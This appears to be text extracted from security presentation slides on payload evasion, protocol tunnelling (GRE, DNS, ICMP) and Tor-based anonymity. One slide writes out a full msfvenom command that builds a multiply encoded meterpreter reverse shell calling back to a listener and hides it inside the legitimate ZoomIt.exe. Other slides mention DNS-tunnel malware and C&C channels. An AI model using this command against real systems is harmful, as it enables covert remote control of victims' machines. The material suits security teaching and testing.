6. msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 -
e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e
x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e
x86/shikata_ga_nai -i 6 -f exe -x ZoomIt.exe -o rev_tcp_multiple_211_443.exe
https://www.virustotal.com/en/file/d8b9f086aefb89d1e05bc0e86a254570430af6ae844e1336d7ce4d7aaceb73bd/analysis/1471899934
17. What is protocol tunnelling?
Basicallytransporting a protocolinside another protocollike GRE (IP protocol 47) which transportsother IP
protocolslike IPv4 (protocol 4), TCP (protocol6) etc.
For instance:a DNS package looks like below:
+------------------------------------------------------------+
| MAC | IP | UDP | DNS | Data :::::::::::::::::::::::::::::: |
+------------------------------------------------------------+
If we use DNS as the transport protocol,we can place a TCP package in the following way :
+------------------------------------------------------------+
| MAC | IP | UDP | DNS | | IP | TCP | HTTP | Data :::::::::| |
+------------------------------------------------------------+
18. Basic Tunnelling
Generic Routing Encapsulation
(GRE) is a tunneling protocol
developed by Cisco Systems
that can encapsulate a wide
variety of network layer
protocols inside virtual point-
to-point links over an Internet
Protocol network. [Wikipedia]
MAC
IP
GRE
IP
ICMP
DATA
19. IP over ICMP
IP over DNS
DNS Tunnel capable malware
Tunnelling demos
ICMP172.16.52.203 172.16.52.216 HTTP Internet
DNS172.16.52.216 Local DNS Server DNS InternetAuth. DNS Server HTTP
DNS172.16.52.216
Local DNS
Server
DNS InternetAuth. DNS
Server
HTTP C&CHTTP
22. Custom Tor Configurations
meek is a pluggable
transport, an obfuscation
layer for Tor designed to
evade Internet censorship.
Whonix is an operating system focused
on anonymity, privacy and security. It's
based on the Tor anonymity network,
Debian and security by isolation.
Tor is a connection-oriented
anonymizing communication service.
SocksPort:443 defines which port is
going to used for SOCKS Proxy
HTTPSClient
Custom
Tor
Tor Internet
GWClient Whonix Tor Internet